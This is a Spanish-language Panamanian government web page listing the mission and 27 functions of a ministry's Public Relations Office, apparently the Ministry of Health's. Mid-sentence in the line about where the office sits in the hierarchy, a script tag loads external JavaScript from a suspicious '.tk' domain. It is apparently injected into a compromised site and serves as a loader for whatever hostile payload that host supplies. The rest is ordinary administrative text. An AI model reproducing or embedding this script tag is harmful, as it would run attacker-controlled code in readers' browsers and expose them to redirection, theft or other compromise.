Gobierno Nacional de Panamá

Oficina de Relaciones Públicas

Información de contacto

Teléfono:
512-9554

Ubicación y dependencia jerárquica

La Oficina de Relaciones Públicas está ubicada en el Nivel Asesor y depende jerárquicamente del Despacho Superior<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Misión:
  1. Asesorar a la Institución en materia de información y relaciones públicas, con base a las prioridades establecidas por el nivel directivo y en los requerimientos propios de cada Unidad Administrativa, para asegurar la oportuna divulgación de las actividades tanto en el plano nacional como en el internacional y la adecuada proyección de la obra institucional y el fortalecimiento de las relaciones con la comunidad.
Funciones:
  1. Participar en la formulación y divulgación de las políticas y estrategias en materia de comunicación social institucional.
  2. Impulsar la imagen corporativa de la institución con la participación de todos los niveles de la organización.
  3. Coordinar las actividades de divulgación de información institucional con Despacho Superior y demás niveles de la organización, así como con los medios de comunicación social.
  4. Gestionar los espacios radiales, televisivos y medios escritos que faciliten la proyección de la institución a nivel naciona
  5. Realizar investigaciones operativas con los usuarios de los servicios mediante las cuales se reconozca el impacto de las acciones que en materia de divulgación institucional se desarrollan
  6. Organizar y coordinar con los diferentes niveles directivos de la institución y del sector salud su participación en programas en los medios de comunicación social.
  7. Participar con la Dirección de Recursos Humanos, en el desarrollo de convenios con las Universidades del país para que los estudiantes de comunicación realicen su práctica profesional en las áreas de comunicación social institucional, a nivel central, regional y local, del Ministerio de Salud, en el marco de los programas de docencia-servicio-investigación-población.
  8. Garantizar la aplicación de las políticas de Estado que se dicten en materia de comunicación.
  9. Orientar los programas de protocolo, información, relaciones públicas y publicidad institucional.
  10. Administrar programas de contacto directos con los usuarios de los servicios de salud que permitan dar información oportuna a los medios de comunicación y la comunidad cuando esta lo solicite.
  11. Representar al Ministerio de Salud en actos públicos y oficiales cuya delegación le sea conferida por el nivel superior.
  12. Elaborar y procesar la información sobre las actividades que realiza la institución.
  13. Coordinar con los medios de comunicación internos y externos, la publicación y divulgación de las noticias, reportajes y actividades de la institución.
  14. Filmar y editar videos diarios para los noticieros televisivos.
  15. Editar y dar seguimiento al Boletín Informativo de Salud.
  16. Supervisar la producción y elaboración de textos, de programas de radio, televisión y prensa.
  17. Diseñar programa de relaciones humanas y atención al público, para todo el personal de la institución.
  18. Coordinar la elaboración de murales de noticias diarias y de conmemoraciones relevantes de la institución.
  19. Monitorear y recortar diariamente las noticias relacionadas con salud en los diferentes medios de comunicación, para su información al Despacho Superior.
  20. Promocionar y distribuir a través de los medios de comunicación social y sectores de influencia, las publicaciones de la institución.
  21. Coordinar con los diferentes centros educativos universitarios, la práctica profesional de estudiantes graduandos en el área de comunicación y carreras afines.
  22. Asesorar a las autoridades sobre el uso correcto de las normas protocolares.
  23. Realizar las actividades de protocolo que el Despacho Superior asigne, al margen del día y la hora en que se lleven a cabo.
  24. Coordinar con la Secretaría General las actividades que requieran del protocolo del Ministro (a)de Salud.
  25. Coordinar todo lo relacionado a la organización de una actividad que requiera del protocolo respectivo.
  26. Confeccionar las tarjetas de invitación, el programa de la actividad y cualquier otro material que se necesite.
  27. Coordinar con la filmación y fotografía de los eventos, así como a divulgación de las actividades del Ministerio de Salud.